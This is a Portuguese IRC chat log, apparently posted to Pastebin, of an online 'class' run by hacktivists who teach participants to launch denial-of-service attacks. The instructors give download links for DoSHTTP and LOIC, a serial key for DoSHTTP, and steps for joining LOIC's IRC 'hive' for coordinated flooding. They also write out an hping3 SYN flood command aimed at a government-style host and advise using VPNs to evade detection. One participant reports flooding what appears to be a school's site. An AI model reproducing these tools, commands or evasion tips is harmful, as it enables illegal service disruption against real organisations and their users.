  977. * PATRAOjhN (jhN@AN-bfv.2ld.0kq3fr.IP) entrou em #aula
  978. <sc0rp> é mais simples para quem entende o trafico e muito melhor para iniciantes, mas o etherape e muito mai facil de usar contudo a informação recebida do servidor nao e a mais detalhada
  979. <sh4d0wf40> pessoal peço desculpa incomudar..mas na outra sala está lá pessoal que queria assistir as aulas mas não dá para falar e avisar o pessoal..só o caravela é que é op
  980. * Caravela|Lulz coloca o modo +m #aula
  981. * ruicruz (ruicruz@AN-tic.j0n.g9g7iv.IP) entrou em #aula
  982. <c0ldc0d3r> 1º DoSHTTP 2.5.1 LINK: http://www.socketsoft.net/download/doshttp_setup.exe Serial: dh10a-0064-5612-1234-37b5-9701
  983. <c0ldc0d3r> 2º LOIC LINK: http://sourceforge.net/projects/hivemindloic/files/latest/download
  984. <c0ldc0d3r> No caso do LOIC não é necessário instalar, é só fazer download e executar, depois onde diz IRC Server, colocam irc.freshirc.com e onde diz channel, colocam #lulzsecportugal, de seguida após isso, clicam em "Fucking hive mode" salvo erro.
  985. * AntiSecPT407 (webchat@AN-2ha.off.6qn8qq.IP) entrou em #aula
  986. <c0ldc0d3r> no caso do DoSHTTP 2.5.1, é só abrir após instalar, e onde diz Target URL: colocam o site que está a ser vítima, e o resto poderam deixar igual.
  987. * aula754 (558a3c21@AN-trk.ahu.7j6nol.IP) entrou em #aula
  988. * unkn0wn (unkn0wn@AN-g1c.sni.4imr8a.IP) entrou em #aula
  989. <c0ldc0d3r> para quem usa Linux, é só instalar o hping3, abrindo um terminal e instalando da seguinte forma: sudo apt-get install hping3
  990. <c0ldc0d3r> e após instalar, fazer hping3 -S -s 80 -p 80 --flood www.vitima.gov.pt
  991. <Marmelo> Relembro que usem vpn enquanto fazem isto!
  992. <c0ldc0d3r> Caravela|Lulz, vai colocando isso no pastebin que não estou para repetir mais vezes
  993. <c0ldc0d3r> Caravela|Lulz, colocas-te +m e agora as dúvidas lol?
  994. <Caravela|Lulz> duvidas façam em pvt
  995. <Caravela|Lulz> depois fazes copy paste aqui e respondes
  996. <Caravela|Lulz> para nao haver spam
  997. * kaos (webchat@AN-c5d.qud.arjsab.IP) entrou em #aula
  998. <c0ldc0d3r> pois, mas eu tenho o xchat cheio de redes e não dá-me jeito nenhum
  999. <Marmelo> caravela estava a ir bem
  1000. <Caravela|Lulz> ok
  1001. * Caravela|Lulz coloca o modo -m #aula
  1002. <Marmelo> ok alguma pergunta?
  1003. * c0ldc0d3r coloca o modo de operador a mitsai
  1004. * c0ldc0d3r oferece voz a mitsai
  1005. <Marmelo> Relembro que quem fizer spam leva ban imediato
  1006. * jgut (529ab6c4@AN-trk.ahu.7j6nol.IP) entrou em #aula
  1007. <tuga> sim
  1008. <Caravela|Lulz> faz me um copy paste do log até agora para eu depois guardar em pastebin
  1009. <c0ldc0d3r> paste onde?
  1010. <tuga> coldcoder, já diz tudo até tu onde disses-te, e agora?
  1011. <c0ldc0d3r> piratepad?
  1012. <jgut> nights a tds
  1013. <c0ldc0d3r> tuga, agora é guardar tudo e amanhã colocarás em ação.
  1014. * PATRAOjhN agora chama-se afk_johnnyPATRAODANET
  1015. <Marmelo> lol ja acabou a aula?
  1016. <sc0rp> lol
  1017. * Hikas (5998a3a5@AN-k5k.v7s.hin4td.IP) entrou em #aula
  1018. * jpir (webchat@AN-he6.c2p.6om10t.IP) entrou em #aula
  1019. <c0ldc0d3r> Marmelo, não há muito à dizer..
  1020. <Marmelo> pois nao lol
  1021. * jgut saiu (Quit: http://www.mibbit.com ajax IRC Client)
  1022. <tuga> amanha? mas escolho um site que eu quiser? tenho de começar a fazer o ataque hoje e deixar a noite toda o pc ligado?
  1023. * Kondoriano (marco@AN-6rp.b7j.od2i7s.IP) entrou em #aula
  1024. <c0ldc0d3r> agora é saber se o pessoal entendou..
  1025. * MaP05 (MaP05@AN-qbn.nlh.vg3fe8.IP) entrou em #aula
  1026. <c0ldc0d3r> já vi que alguém conectou o loic ao hive..
  1027. <c0ldc0d3r> 2 pessoas
  1028. <trolololguy_> uma pergunta
  1029. <Made> c0ldc0der tens é de fazer ai uma auma de sqli
  1030. <AntiSecPT278> O tuga está com fé de ir dentro
  1031. * anarchy (unknown@AN-7rh.t6k.0dagnm.IP) entrou em #aula
  1032. <Made> *uma
  1033. <Grep> c0ldc0d3r, para linux o LOIC é igual?
  1034. <trolololguy_> disseste anteriormente q udp era mais eficaz
  1035. <trolololguy_> podes dizer pq?
  1036. <Marmelo> LOIC nao da no linux
  1037. <trolololguy_> sr professor?
  1038. <c0ldc0d3r> Grep, sim
  1039. <c0ldc0d3r> é mais complicado
  1040. <c0ldc0d3r> mas não recomendo loic para linux..
  1041. <c0ldc0d3r> hping3 é mil vezes melhor
  1042. <Kondoriano> já começou?
  1043. <Marmelo> ah my bad pensava que o loic nao dava para o linux
  1044. <mitsai> sim mt melhor
  1045. <Grep> ok isso já tenho ;) como vi a falar de ligar a um irc...
  1046. <Grep> Marmelo, dar dá... com wine :P
  1047. <Marmelo> <trolololguy_> disseste anteriormente q udp era mais eficaz
  1048. * Cereal_Killer (webchat@AN-opo.t9n.1tveis.IP) entrou em #aula
  1049. <c0ldc0d3r> Caravela|Lulz, onde queres que faça paste do log?
  1050. * emptydev- (a@AN-928.r71.7am7ru.IP) entrou em #aula
  1051. <emptydev-> Caravela|Lulz
  1052. <emptydev-> PVT
  1053. * dgrdfg (unknown@AN-7rh.t6k.0dagnm.IP) entrou em #aula
  1054. <emptydev-> http://pastebin.com/TfnBWewg
  1055. <emptydev-> Vejam
  1056. * fx (fx@AN-ks2.pjq.4nimkf.IP) entrou em #aula
  1057. <c0ldc0d3r> emptydev, boa.
  1058. * beh (boh@AN-us8.nsn.ovi93d.IP) entrou em #aula
  1059. * c0ldc0d3r mudou o tópico para: Aula de hoje resumida: http://pastebin.com/TfnBWewg
  1060. <dgrdfg> estava eu dizendo que deveria haver um sitio pra podermos colocar duvidas e que deviamos elaborar uma faq
  1061. <dgrdfg> visto que as duvidas são mais que muitas
  1062. <c0ldc0d3r> dgrdfg, poderás colocar aqui
  1063. <dgrdfg> e muitas questões são constantemente respondidas
  1064. * aaaamitsai (mitsai@AN-jpu.s6r.q8mj9u.IP) entrou em #aula
  1065. <dgrdfg> tipo sempre o msm
  1066. * An0nf40 (other@AN-i37.9oq.2s61dc.IP) entrou em #aula
  1067. <beh> bem pensado
  1068. * inetking saiu (Ping timeout: 121 seconds)
  1069. * fx agora chama-se inetking
  1070. <c0ldc0d3r> podem usar este canal para ajuda..
  1071. <c0ldc0d3r> é na boa..
  1072. <dgrdfg> c0m0 3h k x3 h@k@ u Fb| ?
  1073. * jhNNN (jhN@AN-bfv.2ld.0kq3fr.IP) entrou em #aula
  1074. <dgrdfg> por exemplo
  1075. <dgrdfg> tenho uma duvida
  1076. * emptydev saiu (Ping timeout: 121 seconds)
  1077. * MaP05 saiu (Ping timeout: 122 seconds)
  1078. * l4m8d4_ (l4m8d4@AN-vhb.75t.gjjh6q.IP) entrou em #aula
  1079. <dgrdfg> porque é que com algumas VPN's n consigo aceder a determinados sites
  1080. * Funho saiu (Ping timeout: 121 seconds)
  1081. <dgrdfg> ou servers
  1082. <dgrdfg> e como evitar que isso aconteça
  1083. * anarchy saiu (Ping timeout: 121 seconds)
  1084. <Grep> c0ldc0d3r, aquele site ping.eu n é melhor o nmap ?
  1085. * dgrdfg agora chama-se anarchy
  1086. <c0ldc0d3r> isso tem haver com o policy que eles têm contra abusos do serviço..
  1087. * AntiSecPT570 (webchat@AN-t76.bhi.3kcki8.IP) entrou em #aula
  1088. <tuga> coldcoder, quanto tiveres tempo, se tiveres tempo e se fizeres o favor de me contactar, por favor contacta-me em pvt, obrigado
  1089. <c0ldc0d3r> tens que usar outra vpn e de preferência fora da europa.
  1090. <Made> amanha há aula?
  1091. <anarchy> pois foi o que eu pensei
  1092. <anarchy> há que pagar :F
  1093. <c0ldc0d3r> Grep, o nmap verifica com o teu ip
  1094. * VenusProject saiu (Ping timeout: 121 seconds)
  1095. <c0ldc0d3r> o ping.eu não.
  1096. <anarchy> mas há vpn's que têm ports fechadas?
  1097. <c0ldc0d3r> tuga, ok
  1098. * ruicruz saiu (Ping timeout: 127 seconds)
  1099. * afk_johnnyPATRAODANET saiu (Ping timeout: 127 seconds)
  1100. * kaos saiu (Quit: Page closed)
  1101. <Grep> Grep, com o proxychains não, pois não? pelo menos pelo que li :S
  1102. * Kondoriano saiu (Ping timeout: 129 seconds)
  1103. * aula754 saiu (Ping timeout: 128 seconds)
  1104. * sc0rp saiu (Ping timeout: 129 seconds)
  1105. <c0ldc0d3r> proxychains poderá resultar...
  1106. <c0ldc0d3r> é uma questão de verificar
  1107. * w4r10ck saiu (Quit: )
  1108. * Hikas saiu (Ping timeout: 132 seconds)
  1109. * Caravela|Lulz saiu (Ping timeout: 125 seconds)
  1110. * l4m8d4 saiu (Ping timeout: 131 seconds)
  1111. * joao_ saiu (Ping timeout: 125 seconds)
  1112. * Marmelo saiu (Ping timeout: 122 seconds)
  1113. * trolololguy_ saiu (Ping timeout: 129 seconds)
  1114. * mitsai saiu (Ping timeout: 125 seconds)
  1115. * sh4d0wf40 saiu (Ping timeout: 157 seconds)
  1116. * l4m8d4_ agora chama-se l4m8d4
  1117. <Grep> tenho feito uns testes, obvio que é mais lento mas tem funcionado... mas é sempre bom haver outras soluções ;) já aprendi kk koisa
  1118. * aaaamitsai (mitsai@AN-jpu.s6r.q8mj9u.IP) saiu de #aula
  1119. <emptydev-> Tinhamos ido para a quakenet, tinhamos + gente, e ninguem caia.
  1120. <c0ldc0d3r> emptydev-, link.
  1121. <c0ldc0d3r> que eu dou ao caravela
  1122. <c0ldc0d3r> para por no twitter
  1123. <Grep> só uma questão que eu cheguei a meio da aula...
  1124. <tuga> c0ldc0d3r, é suposto no LOIC, em baixo em attack status aparecer muitas vezes a dizer failed? pq tenho uns 32.000
  1125. <Grep> o hping3 substitui o DoSHTTP e o Loic certo?
  1126. <c0ldc0d3r> é, isso significa que o servidor está deixando de responder.
  1127. <c0ldc0d3r> Grep, sim.
  1128. <An0nf40> tuga tu estás a fazer isso com uma vpn certo?
  1129. <tuga> nao lool
  1130. <An0nf40> ou estás simplesmente a testar sem nada lol
  1131. <c0ldc0d3r> vpn é necessário, visto que somos poucos..
  1132. <tuga> mas tipo
  1133. <c0ldc0d3r> se fosse tipo 2 mil e tal pessoas a colaborar.. era cagativo usar vpn no meio de tantos ips..
  1134. <tuga> eu ponho em perigo outras pessoas?
  1135. <c0ldc0d3r> mas como são poucos :\
  1136. * aaaamitsai (mitsai@AN-jpu.s6r.q8mj9u.IP) entrou em #aula
  1137. <aaaamitsai> +v +o
  1138. * aaaamitsai (mitsai@AN-jpu.s6r.q8mj9u.IP) saiu de #aula
  1139. * Funho (Funho@AN-hf8.a49.qoipr8.IP) entrou em #aula
  1140. * aaaamitsai (mitsai@AN-jpu.s6r.q8mj9u.IP) entrou em #aula
  1141. <tuga> mas eu nao testei num site do governo
  1142. * aaaamitsai (mitsai@AN-jpu.s6r.q8mj9u.IP) saiu de #aula
  1143. * mitsai (mitsai@AN-jpu.s6r.q8mj9u.IP) entrou em #aula
  1144. * VenusProject (VenusProje@AN-md1.ic0.l1e4n7.IP) entrou em #aula
  1145. <An0nf40> não precisa ser do governo lol
  1146. <mitsai> +v +o pl
  1147. * emptydev- saiu (Ping timeout: 121 seconds)
  1148. <An0nf40> eles dão mais importancia a esses...
  1149. <tuga> sim, mas acho que uma escola eles nao dao importancia o.O xD
  1150. <Grep> lol omg
  1151. * DaGun (webchat@AN-a0h.8na.8e30u1.IP) entrou em #aula
  1152. * An0nf40 agora chama-se sh4d0wf40
  1153. <DaGun> boas, vao por a aula de hoje no pastebin?
  1154. <tuga> ao desligar o ataque no LOIC o site volta imediatamente online certo?
  1155. <DaGun> e que tava com problemas na net e perdi uma parte
  1156. <DaGun> :S
  1157. <sh4d0wf40> lolol
  1158. <DaGun> xD
  1159. <tuga> dagun, ja puseram penso eu
  1160. <Made> DaGun http://pastebin.com/TfnBWewg]
  1161. <DaGun> só?
  1162. <c0ldc0d3r> tuga, sim e não.
  1163. * LzKotha (webchat@AN-dft.gs0.hkmcdf.IP) entrou em #aula
  1164. <c0ldc0d3r> se o impacto for muito grande.. o site poderá ficar off até haver assistência física.
  1165. <DaGun> é que eu isso apanhei xD
  1166. * MovingForward (VenusProje@AN-md1.ic0.l1e4n7.IP) entrou em #aula
  1167. <tuga> ah ok
  1168. <mitsai> +v +o pls
  1169. <Made> Ao usar uma vpn, a vnp não fica com os meus dados no log?
  1170.  
  1171. <recording inlog>
  1172. end of file
  1173.  
  1174.  
  1175.  
  1176.  
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement